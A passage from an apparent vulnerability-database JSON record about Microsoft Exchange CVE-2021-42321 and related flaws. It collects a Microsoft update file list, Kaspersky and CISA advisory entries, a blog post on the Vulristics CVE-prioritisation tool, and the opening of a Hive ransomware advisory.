x86| SP. \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.0.1497.26| 17,904| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.malware.dll| 15.0.1497.26| 133,080| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.0.1497.26| 21,480| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.0.1497.26| 29,680| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.0.1497.26| 48,112| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.search.dll| 15.0.1497.26| 30,184| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.0.1497.26| 54,248| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.0.1497.26| 28,640| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.0.1497.26| 17,896| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.0.1497.26| 45,032| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.common.dll| 15.0.1497.26| 39,384| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.dll| 15.0.1497.26| 3,542,504| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.logging.search.dll| 15.0.1497.26| 73,704| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.loggingcommon.dll| 15.0.1497.26| 59,864| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.0.1497.26| 21,464| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.scheduler.dll| 15.0.1497.26| 61,912| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.storage.contracts.dll| 15.0.1497.26| 27,624| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.storage.dll| 15.0.1497.26| 35,296| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.sync.agents.dll| 15.0.1497.26| 17,880| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.sync.common.dll| 15.0.1497.26| 515,560| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.sync.manager.dll| 15.0.1497.26| 316,888| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.0.1497.26| 47,080| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transport.sync.worker.dll| 15.0.1497.26| 1,079,784| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.0.1497.26| 18,408| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.um.callrouter.exe| 15.0.1497.26| 22,512| 28-Oct-21| 20:01| x86| SP. \nMicrosoft.exchange.um.clientstrings.dll| 15.0.1497.26| 63,464| 28-Oct-21| 20:01| x86| SP. \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.0.1497.26| 118,768| 28-Oct-21| 20:01| x86| SP. \nMicrosoft.exchange.um.ucmaplatform.dll| 15.0.1497.26| 244,720| 28-Oct-21| 20:01| x86| SP. \nMicrosoft.exchange.um.umcommon.dll| 15.0.1497.26| 967,160| 28-Oct-21| 20:01| x86| SP. \nMicrosoft.exchange.um.umcore.dll| 15.0.1497.26| 1,515,512| 28-Oct-21| 20:01| x86| SP. \nMicrosoft.exchange.unifiedcontent.dll| 15.0.1497.26| 40,440| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.0.1497.26| 23,008| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.0.1497.26| 38,880| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.variantconfiguration.dll| 15.0.1497.26| 769,488| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.exchange.workloadmanagement.dll| 15.0.1497.26| 193,504| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.filtering.exchange.dll| 15.0.1497.26| 47,544| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.filtering.interop.dll| 15.0.1497.26| 15,288| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.forefront.activedirectoryconnector.dll| 15.0.1497.26| 47,032| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 23,746| 28-Oct-21| 19:31| Not applicable| SP. \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,345| 28-Oct-21| 19:31| Not applicable| SP. \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.0.1497.26| 1,170,976| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.0.1497.26| 31,264| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.forefront.reporting.common.dll| 15.0.1497.26| 42,456| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.0.1497.26| 37,864| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.isam.esent.interop.dll| 15.0.1497.26| 473,528| 28-Oct-21| 19:33| x86| SP. \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.0.1497.26| 80,864| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.office.compliancepolicy.platform.dll| 15.0.1497.26| 1,245,648| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.0.1497.26| 51,672| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.0.1497.26| 28,176| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.0.1497.26| 544,736| 28-Oct-21| 19:32| x86| SP. \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.0.1497.26| 166,416| 28-Oct-21| 19:31| x86| SP. \nMicrosoft.office.datacenter.workertaskframeworkinternalprovider.dll| 15.0.1497.26| 252,368| 28-Oct-21| 19:32| x86| SP. \nMigrateumcustomprompts.ps1| Not applicable| 19,186| 28-Oct-21| 19:31| Not applicable| SP. \nMovemailbox.ps1| Not applicable| 61,228| 28-Oct-21| 19:31| Not applicable| SP. \nMovetransportdatabase.ps1| Not applicable| 30,650| 28-Oct-21| 19:31| Not applicable| SP. \nMove_publicfolderbranch.ps1| Not applicable| 35,162| 28-Oct-21| 19:31| Not applicable| SP. \nMsexchangedagmgmt.exe| 15.0.1497.26| 23,016| 28-Oct-21| 19:33| x86| SP. \nMsexchangedelivery.exe| 15.0.1497.26| 31,728| 28-Oct-21| 19:32| x86| SP. \nMsexchangefrontendtransport.exe| 15.0.1497.26| 25,576| 28-Oct-21| 19:31| x86| SP. \nMsexchangehmhost.exe| 15.0.1497.26| 25,616| 28-Oct-21| 19:31| x86| SP. \nMsexchangehmworker.exe| 15.0.1497.26| 34,848| 28-Oct-21| 19:31| x86| SP. \nMsexchangemailboxassistants.exe| 15.0.1497.26| 2,391,536| 28-Oct-21| 19:32| x86| SP. \nMsexchangemailboxreplication.exe| 15.0.1497.26| 20,496| 28-Oct-21| 19:31| x86| SP. \nMsexchangemigrationworkflow.exe| 15.0.1497.26| 46,096| 28-Oct-21| 19:31| x86| SP. \nMsexchangerepl.exe| 15.0.1497.26| 66,016| 28-Oct-21| 19:33| x86| SP. \nMsexchangesubmission.exe| 15.0.1497.26| 61,936| 28-Oct-21| 19:32| x86| SP. \nMsexchangethrottling.exe| 15.0.1497.26| 40,432| 28-Oct-21| 19:31| x86| SP. \nMsexchangetransport.exe| 15.0.1497.26| 77,272| 28-Oct-21| 19:31| x86| SP. \nMsexchangetransportlogsearch.exe| 15.0.1497.26| 143,320| 28-Oct-21| 19:31| x86| SP. \nMsexchangewatchdog.exe| 15.0.1497.26| 55,216| 28-Oct-21| 19:31| x64| SP. \nMspatchlinterop.dll| 15.0.1497.26| 53,672| 28-Oct-21| 19:31| x64| SP. \nNavigatorparser.dll| 15.0.1497.26| 649,128| 28-Oct-21| 19:31| x64| SP. \nNewtestcasconnectivityuser.ps1| Not applicable| 22,312| 28-Oct-21| 19:31| Not applicable| SP. \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,627| 28-Oct-21| 19:31| Not applicable| SP. \nOleconverter.exe| 15.0.1497.26| 165,808| 28-Oct-21| 19:31| x64| SP. \nOwaauth.dll| 15.0.1497.26| 91,552| 28-Oct-21| 19:31| x64| SP. \nPerf_common_extrace.dll| 15.0.1497.26| 210,352| 28-Oct-21| 19:31| x64| SP. \nPerf_exchmem.dll| 15.0.1497.26| 80,296| 28-Oct-21| 19:31| x64| SP. \nPipeline2.dll| 15.0.1497.26| 1,467,816| 28-Oct-21| 19:31| x64| SP. \nPostexchange2000_schema99.ldf| Not applicable| 6,495| 27-Oct-21| 20:31| Not applicable| SP. \nPostexchange2003_schema99.ldf| Not applicable| 41,776| 27-Oct-21| 20:31| Not applicable| SP. \nPostwindows2003_schema99.ldf| Not applicable| 5,544| 27-Oct-21| 20:31| Not applicable| SP. \nPowershell.rbachostingtools.dll_1bf4f3e363ef418781685d1a60da11c1| 15.0.1497.26| 41,376| 28-Oct-21| 19:31| Not applicable| SP. \nPreparemoverequesthosting.ps1| Not applicable| 71,043| 28-Oct-21| 19:31| Not applicable| SP. \nPrepare_moverequest.ps1| Not applicable| 73,277| 28-Oct-21| 19:31| Not applicable| SP. \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 46,570| 28-Oct-21| 19:31| Not applicable| SP. \nReinstalldefaulttransportagents.ps1| Not applicable| 20,804| 28-Oct-21| 19:31| Not applicable| SP. \nRemoteexchange.ps1| Not applicable| 21,829| 28-Oct-21| 19:31| Not applicable| SP. \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,779| 28-Oct-21| 19:31| Not applicable| SP. \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,115| 28-Oct-21| 19:31| Not applicable| SP. \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,105| 28-Oct-21| 19:31| Not applicable| SP. \nResetattachmentfilterentry.ps1| Not applicable| 15,524| 28-Oct-21| 19:31| Not applicable| SP. \nResetcasservice.ps1| Not applicable| 21,755| 28-Oct-21| 19:31| Not applicable| SP. \nRightsmanagementwrapper.dll| 15.0.1497.26| 79,256| 28-Oct-21| 19:28| x64| SP. \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,850| 28-Oct-21| 19:31| Not applicable| SP. \nRpcproxyshim.dll| 15.0.1497.26| 40,344| 28-Oct-21| 19:28| x64| SP. \nRwsperfcounters.xml| Not applicable| 23,000| 28-Oct-21| 19:32| Not applicable| SP. \nScanenginetest.exe| 15.0.1497.26| 957,872| 28-Oct-21| 19:31| x64| SP. \nScanningprocess.exe| 15.0.1497.26| 725,928| 28-Oct-21| 19:31| x64| SP. \nSchema99.ldf| Not applicable| 26,237| 27-Oct-21| 20:31| Not applicable| SP. \nSchemaadam.ldf| Not applicable| 348,383| 27-Oct-21| 20:31| Not applicable| SP. \nSchemaversion.ldf| Not applicable| 1,905| 27-Oct-21| 20:31| Not applicable| SP. \nSearchdiagnosticinfo.ps1| Not applicable| 16,876| 28-Oct-21| 19:31| Not applicable| SP. \nSetup.exe| 15.0.1497.26| 20,968| 28-Oct-21| 19:31| x86| SP. \nSetupui.exe| 15.0.1497.26| 49,128| 28-Oct-21| 19:31| x86| SP. \nSplit_publicfoldermailbox.ps1| Not applicable| 104,476| 28-Oct-21| 19:31| Not applicable| SP. \nStoretsconstants.ps1| Not applicable| 15,862| 28-Oct-21| 19:28| Not applicable| SP. \nStoretslibrary.ps1| Not applicable| 28,055| 28-Oct-21| 19:28| Not applicable| SP. \nTranscodingservice.exe| 15.0.1497.26| 124,312| 28-Oct-21| 19:29| x64| SP. \nTroubleshoot_ci.ps1| Not applicable| 22,759| 28-Oct-21| 19:28| Not applicable| SP. \nTroubleshoot_databaselatency.ps1| Not applicable| 33,461| 28-Oct-21| 19:28| Not applicable| SP. \nTroubleshoot_databasespace.ps1| Not applicable| 30,081| 28-Oct-21| 19:28| Not applicable| SP. \nUglobal.js| Not applicable| 866,860| 28-Oct-21| 18:43| Not applicable| SP. \nUmservice.exe| 15.0.1497.26| 102,896| 28-Oct-21| 20:01| x86| SP. \nUmworkerprocess.exe| 15.0.1497.26| 38,392| 28-Oct-21| 20:01| x86| SP. \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,078| 28-Oct-21| 19:31| Not applicable| SP. \nUpdateserver.exe| 15.0.1497.26| 3,035,568| 28-Oct-21| 19:31| x64| SP. \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,571| 28-Oct-21| 19:31| Not applicable| SP. \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 30,135| 28-Oct-21| 18:48| Not applicable| SP. \nWsbexchange.exe| 15.0.1497.26| 124,824| 28-Oct-21| 19:29| x64| SP. \n_search.mailboxoperators.a| 15.0.1497.26| 130,504| 28-Oct-21| 19:33| Not applicable| SP. \n_search.mailboxoperators.b| 15.0.1497.26| 130,504| 28-Oct-21| 19:33| Not applicable| SP. \n_search.tokenoperators.a| 15.0.1497.26| 80,328| 28-Oct-21| 19:33| Not applicable| SP. \n_search.tokenoperators.b| 15.0.1497.26| 80,328| 28-Oct-21| 19:33| Not applicable| SP. \n_search.transportoperators.a| 15.0.1497.26| 43,976| 28-Oct-21| 19:33| Not applicable| SP. \n_search.transportoperators.b| 15.0.1497.26| 43,976| 28-Oct-21| 19:33| Not applicable| SP. \n \n## Information about protection and security\n\nProtect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151>)Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T08:00:00", "type": "mskb", "title": "Description of the security update for Microsoft Exchange Server 2019, 2016, and 2013: November 9, 2021 (KB5007409)", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41349", "CVE-2021-42305", "CVE-2021-42321"], "modified": "2021-11-09T08:00:00", "id": "KB5007409", "href": "https://support.microsoft.com/en-us/help/5007409", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-02-08T15:43:26", "description": "### *Detect date*:\n11/09/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to perform cross-site scripting attack, execute arbitrary code, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 10 \nMicrosoft Exchange Server 2019 Cumulative Update 11 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 22 \nMicrosoft Exchange Server 2016 Cumulative Update 21\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-41349](<https://nvd.nist.gov/vuln/detail/CVE-2021-41349>) \n[CVE-2021-42321](<https://nvd.nist.gov/vuln/detail/CVE-2021-42321>) \n[CVE-2021-42305](<https://nvd.nist.gov/vuln/detail/CVE-2021-42305>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-41349](<https://vulners.com/cve/CVE-2021-41349>)4.3Warning \n[CVE-2021-42321](<https://vulners.com/cve/CVE-2021-42321>)6.5High \n[CVE-2021-42305](<https://vulners.com/cve/CVE-2021-42305>)4.3Warning\n\n### *KB list*:\n[5007409](<http://support.microsoft.com/kb/5007409>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "kaspersky", "title": "KLA12342 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41349", "CVE-2021-42305", "CVE-2021-42321"], "modified": "2022-01-18T00:00:00", "id": "KLA12342", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12342/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-11-30T22:36:54", "description": "Hello everyone! In this episode I want to highlight the latest changes in my [Vulristics](<https://github.com/leonov-av/vulristics>) project. For those who don't know, this is a utility for prioritizing CVE vulnerabilities based on data from various sources.. Currently Microsoft, NVD, Vulners, AttackerKB.\n\n## Command Line Interface\n\nI started working on the CLI for Vulristics. Of course, it is not normal to edit scripts every time to release a report.\n\n### CVE lists\n\nIf you have a list of CVEs that you want to analyze, you can run Vulristics this way\n \n \n python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"New Project\" --cve-list-path \"analyze_cve_list.txt\" --cve-data-sources \"ms,nvd,vulners,attackerkb\" --rewrite-flag \"True\"\n\nIn **analyze_cve_list.txt** I have one CVE\n \n \n CVE-2021-42284\n\nThe output:\n \n \n Reading existing Patch Tuesday profile...\n Exclude CVEs: 0\n No specified products to analyze set in profile, reporting everything\n All CVEs: 1\n Counting CVE scores...\n Collecting MS CVE data...\n Collecting NVD CVE data...\n Collecting AttackerKB CVE data...\n Collecting Vulners CVE data...\n Counting CVE scores...\n Making vulnerability reports for each reports config...\n Report config: with_comments_ext_img\n Report generated: reports/new_project_report_with_comments_ext_img.html\n\nAnd in the **reports/new_project_report_with_comments_ext_img.html** file we can see a block for this CVE\n\n![](https://avleonov.com/wp-content/uploads/2021/11/image.png)\n\nI can add a file with comments as well. This can be useful if you are analyzing scan results for multiple hosts and you have such data:\n \n \n Vulnerability Scanner|CVE-2021-42284 - detected on testhost1.corporation.com\n\nYou add a key `--cve-comments-path \"analyze_cve_comments.txt\"`\n \n \n python3.8 vulristics.py --report-type \"cve_list\" --cve-project-name \"New Project\" --cve-list-path \"analyze_cve_list.txt\" --cve-comments-path \"analyze_cve_comments.txt\" --cve-data-sources \"ms,nvd,vulners,attackerkb\" --rewrite-flag \"True\"\n\nAnd you see this comment under the vulnerability block. Quite convenient.\n\n![](https://avleonov.com/wp-content/uploads/2021/11/image-1.png)\n\n### Microsoft Patch Truesdays\n\nYou can also make a Microsoft Patch Tuesday report simply by \n \n \n python3.8 vulristics.py --report-type \"ms_patch_tuesday\" --mspt-year 2021 --mspt-month \"November\" --rewrite-flag \"True\"\n\nAnd get a **reports/ms_patch_tuesday_november2021_report_with_comments_ext_img.html**\n\n![](https://avleonov.com/wp-content/uploads/2021/11/image-2.png)\n\nBut before discussing the November Patch Tuesday report, of course if someone is still interested in it in the last day of November, I want to talk about the product and vulnerability type detections. \n\n## Improved Product & Vuln. Type Detection\n\nI heavily reworked the part about product and vulnerability type detection. I have simplified and unified the connectors for the sources. Sources now provide text strings for detection. Detection occurs at the time of generation of the report, through the analysis of all available descriptions of vulnerabilities.\n\nAll product detection rules are in **data/classification/products.json**\n\nYou can also manage the priority of software detection. In simple terms, the word "Windows" can indicate that the vulnerability is in the Windows kernel. But only if nothing more specific and rare was detected. For example "Skype for Windows". We can achieve this by setting _detection_priority = -1_ for Windows kernel.\n\n![](https://avleonov.com/wp-content/uploads/2021/11/image-3.png)\n\nThe strings for Vulnerability Type and Product are now highlighted in the vulnerability description with blue and orange.\n\n## Microsoft Patch Tuesday November 2021\n\nJust a few words. It was a calm Patch Tuesday. There are 55 vulnerabilities in total. One Urgent level and one Critical level. \n\n**Security Feature Bypass** - Microsoft Excel ([CVE-2021-42292](<https://vulners.com/cve/CVE-2021-42292>))\n\n![](https://avleonov.com/wp-content/uploads/2021/11/image-4.png)\n\nit was featured as an Urgent because of exploitation in the wild. And besides, because of a Github exloit on Vulners. However, this is false positive. This is not an exploit, but a detection rule. This happens.\n\n**Remote Code Execution** - Microsoft Exchange ([CVE-2021-42321](<https://vulners.com/cve/CVE-2021-42321>)) - Critical [718]\n\n![](https://avleonov.com/wp-content/uploads/2021/11/image-5.png)\n\n"This is an actively exploited vulnerability that affects Microsoft Exchange Server 2019 and Microsoft Exchange Server 2016. This is a post-authentication vulnerability that allows code execution."\n\nFor those interested, there is a link to [the entire report](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_november2021_report_with_comments_ext_img.html>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-30T20:30:48", "type": "avleonov", "title": "Vulristics Command Line Interface, improved Product & Vuln. Type Detections and Microsoft Patch Tuesday November 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42284", "CVE-2021-42292", "CVE-2021-42321"], "modified": "2021-11-30T20:30:48", "id": "AVLEONOV:C2458CFFC4493B2CEDB0D34243DEBE3F", "href": "https://avleonov.com/2021/11/30/vulristics-command-line-interface-improved-product-vuln-type-detections-and-microsoft-patch-tuesday-november-2021/", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "cisa": [{"lastseen": "2022-01-26T11:29:28", "description": "CISA has added four new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), which require remediation from federal civilian executive branch (FCEB) agencies by December 1, 2021. CISA has evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise. \n\n**CVE Number** | **CVE Title** | **Remediation Due Date** \n---|---|--- \n[CVE-2021-22204](<https://nvd.nist.gov/vuln/detail/CVE-2021-22204>) | Exiftool Remote Code Execution vulnerability | 12/01/2021 \n[CVE-2021-40449](<https://nvd.nist.gov/vuln/detail/CVE-2021-40449>) | Microsoft Win32k Elevation of Privilege | 12/01/2021 \n[CVE-2021-42292](<https://nvd.nist.gov/vuln/detail/CVE-2021-42292>) | Microsoft Excel Security Feature Bypass | 12/01/2021 \n[CVE-2021-42321](<https://nvd.nist.gov/vuln/detail/CVE-2021-42321>) | Microsoft Exchange Server Remote Code Execution | 12/01/2021 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/cisa-adds-four-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-17T00:00:00", "type": "cisa", "title": "CISA Adds Four Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204", "CVE-2021-40449", "CVE-2021-42292", "CVE-2021-42321"], "modified": "2022-01-25T00:00:00", "id": "CISA:D12090E3D1C36426271DE8458FFF31E4", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/cisa-adds-four-known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-03-14T18:24:14", "description": "### Summary\n\nActions to Take Today to Mitigate Cyber Threats from Ransomware:\n\n\u2022 Prioritize remediating [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Enable and enforce multifactor authentication with strong passwords \n\u2022 Close unused ports and remove any application not deemed necessary for day-to-day operations.\n\n_Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit [stopransomware.gov](<https://www.cisa.gov/stopransomware>) to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known Hive IOCs and TTPs identified through FBI investigations as recently as November 2022.\n\nFBI, CISA, and HHS encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. Victims of ransomware operations should report the incident to their local FBI field office or CISA.\n\nDownload the PDF version of this report: pdf, 852.9 kb.\n\nFor a downloadable copy of IOCs, see AA22-321A.stix (STIX, 43.6 kb).\n\n### Technical Details\n\n_Note: This advisory uses the MITRE ATT&CK\u00ae for Enterprise framework, version 12. See [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v12/matrices/enterprise/>) for all referenced tactics and techniques._\n\nAs of November 2022, Hive ransomware actors have victimized over 1,300 companies worldwide, receiving approximately US$100 million in ransom 